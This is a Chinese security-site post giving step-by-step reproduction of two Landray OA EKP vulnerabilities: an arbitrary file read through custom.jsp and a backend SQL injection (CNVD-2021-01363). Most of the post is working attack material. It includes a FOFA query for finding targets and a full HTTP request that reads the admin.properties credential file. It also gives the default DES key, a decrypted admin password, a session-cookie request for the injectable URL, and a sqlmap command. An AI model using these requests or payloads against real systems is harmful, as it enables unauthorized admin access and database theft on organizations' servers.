蓝凌OA EKP后台密码读解密+SQL注入(CNVD-2021-01363)–Komorebi-漏洞文库小世界-安全文库-NGC660 安全实验室

蓝凌OA EKP后台密码读解密+SQL注入(CNVD-2021-01363)–Komorebi

昶之琴徽章-资深玩家-NGC660 安全实验室等级-LV5-NGC660 安全实验室1年前发布
6690

后台密码读解密

漏洞描述

蓝凌OA(EKP)存在任意文件读取漏洞。可利用漏洞获取敏感信息,读取配置文件得到密码后访问后台

漏洞影响版本

蓝凌OA
FOFA
app=“Landray-OA系统”

漏洞复现

利用custom.jsp任意文件读取漏洞来读取配置文件
POST请求:

http://x.x.x.x/sys/ui/extend/varkind/custom.jsp

读取配置文件:

/WEB-INF/KmssConfig/admin.properties

此处需要写为如下格式:

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

Burp构造数据包

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: X.X.X.X
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

1627629011111-bb01808b-7959-43e3-8d4f-2edc462ee30d

接着可以将得到的密钥:

chuciDiIU2nhEz\/JLVTdUw==

拿去DES在线解密网站进行解密默认密钥:kmssAdminKey
在线解密网站:http://tool.chacuo.net/cryptdes

1627629041073-ed436f7a-6365-4fb3-bdd5-381571a6983e

登录系统

账户admin
密码abcABC123

1627629065179-21749f9c-d52e-45bf-8c81-fc2ea858c596

后台SQL注入 CNVD-2021-01363

影响版本

2021-3-24 前版本

漏洞复现

存在漏洞的URL

https://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true

构造数据包(注意替换后台cookie)

GET /km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Pragma: no-cache
Cache-Control: no-cache
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: JSESSIONID=77CDA7F42BF28CB78E5AC84B8A560664

保存为此文件,使用sqlmap跑注入

sqlmap -r sql.txt -p orderby --dbs

1627629121401-5279df2e-7b9d-4b68-9e74-89df665eef91

参考文章

蓝凌OA EKP 后台SQL注入漏洞 CNVD-2021-01363 | CN-SEC 中文网
http://cn-sec.com/archives/299683.html 蓝凌OA后台密码读解密+POC – Chen-w – 博客园
https://www.cnblogs.com/chen-w/p/14884175.html

评分
欢迎为Ta评分
分享
请登录后发表评论

    请登录后查看回复内容

用户封面
昶之琴的头像-NGC660 安全实验室
【9.24】php反序列化&代码执行
【9.18】XXE&变量覆盖漏洞
【9.10】SSRF+文件包含
【9.9】支付漏洞
【8.7】越权漏洞
Kraken:一款基于爆破技术的多平台分布式密码安全测试工具-NGC660 安全实验室
2.6W+人已阅读
Kraken:一款基于爆破技术的多平台分布式密码安全测试工具
TOP1
挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant-NGC660 安全实验室
挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant
2年前6866人已阅读
TOP2
HTB靶机渗透系列之Sniper -NGC660 安全实验室
HTB靶机渗透系列之Sniper 
2年前5898人已阅读
TOP3
Webshell管理工具流量检测研究:chopper、蚁剑、冰蝎、哥斯拉-NGC660 安全实验室
Webshell管理工具流量检测研究:chopper、蚁剑、冰蝎、哥斯拉
2年前1663人已阅读
TOP4
微软去年拦截了数百亿次暴力破解和网络钓鱼攻击-NGC660 安全实验室
微软去年拦截了数百亿次暴力破解和网络钓鱼攻击
2年前1552人已阅读
TOP5
【初级】Next.js目录遍历-NGC660 安全实验室
【初级】Next.js目录遍历
2年前1470人已阅读
TOP6
【初级】WP Statistics SQL注入 (CVE-2022-25149)-NGC660 安全实验室
【初级】WP Statistics SQL注入 (CVE-2022-25149)
2年前1113人已阅读
TOP7
【初级】artifactory 未授权访问-NGC660 安全实验室
【初级】artifactory 未授权访问
2年前916人已阅读
TOP8
【初级】jira 未授权访问-NGC660 安全实验室
【初级】jira 未授权访问
2年前889人已阅读
TOP9
网络安全应急响应工具包合集-NGC660 安全实验室
网络安全应急响应工具包合集
1年前874人已阅读
TOP10
圈子开耕者
分类-最近更新-NGC660 安全实验室 12.8W+
最近更新
最近更新文章...
468篇文章更多文章
APT37针对韩国外交部下发RokRAT
1年前
SubOver:一款功能强大的子域名接管测试工具
1年前
如何使用53R3N17Y完成主机网络侦查和信息收集任务
1年前
暗网深度调查:Google Play恶意软件的供求生意
1年前
如何使用DragonCastle从LSASS进程中提取NTLM哈希
1年前
分类-安全新闻-NGC660 安全实验室 2.3W+
安全新闻
分享安全时事,安全新闻播报推送
86篇文章更多文章
APT37针对韩国外交部下发RokRAT
1年前
暗网深度调查:Google Play恶意软件的供求生意
1年前
探析人工智能对网络安全的真正潜在影响
1年前
微信闪退BUG:一张神奇的二维码图片
1年前
印度跨国银行遭遇数据泄露,数百万敏感数据被公开访问
1年前
发布文章发布尘埃
扫码添加微信-NGC660 安全实验室
在手机上浏览此页面